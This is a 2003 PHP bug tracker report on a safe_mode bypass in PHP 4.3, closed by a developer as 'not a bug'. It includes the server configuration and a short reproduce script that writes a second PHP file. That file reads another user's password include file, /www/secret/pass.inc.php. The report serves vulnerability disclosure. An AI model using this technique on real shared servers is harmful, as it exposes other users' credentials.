php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #25149 safe_mode bypass
Submitted: 2003-08-19 11:15 UTC Modified: 2003-08-19 11:18 UTC
From: marrtins at hackers dot lv Assigned:
Status: Not a bug Package: Scripting Engine problem
PHP Version: 4.3.1 OS: Linux
Private report: No CVE-ID: None
View Developer Edit
 [2003-08-19 11:15 UTC] marrtins at hackers dot lv 
Description:
------------
apache_1.3.27
httpd.conf
----------
User webmaster
Group nobody

./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite

======================================
php-4.3.0
php.ini
---------
safe_mode               =       On

./configure \
--with-mysql=/usr/local \
--with-mcrypt=/usr/local/lib/libmcrypt \
--with-apache=../apache_1.3.27 \
--enable-track-vars \
--with-gd=/usr/local \
--with-interbase=/opt/interbase \
--enable-trans-sid \
--with-png-dir=/usr/local \
--with-jpeg-dir=/usr/local \
--with-zlib-dir=/usr/local \
--enable-sockets \
--with-gettext \
--with-xml \
--enable-ftp \
--with-imap=/root/.hore_imp/imap-2002.RC10 \
--with-iconv=/usr/local/

======================================

~/public_html> ls -al *
drwxr-xr-x    3 test     users        4096 aug 19 19:05 .
drwx--x--x    5 test     users        4096 aug 19 19:04 ..
-rw-r--r--    1 test     users         146 aug 19 18:47 hack.php
drwxrwxrwx    2 test     users        4096 aug 19 19:03 test

after accessing http://some_server/~test/hack.php php makes test/stole.php

~/public_html> ls -al test
drwxrwxrwx    2 test     users        4096 aug 19 19:07 .
drwxr-xr-x    3 test     users        4096 aug 19 19:05 ..
-rw-r--r--    1 webmaste nobody         61 aug 19 19:07 stole.php

after that http://some_server/~test/test/stole.php locally reads /www/secret/pass.inc.php owned by webmaster

Reproduce code:
---------------
<?
  $data='<? $data = file(\'/www/secret/pass.inc.php\'); print_r($data); ?>';
  $f=fopen('/home/test/public_html/test/stole.php', 'w');
  fwrite($f, $data);
  fclose($f);
?>

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2003-08-19 11:18 UTC] iliaa@php.net 
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

This is how safe_mode works.
 
PHP Copyright © 2001-2026 The PHP Group
All rights reserved. 		Last updated: Tue Feb 17 23:00:01 2026 UTC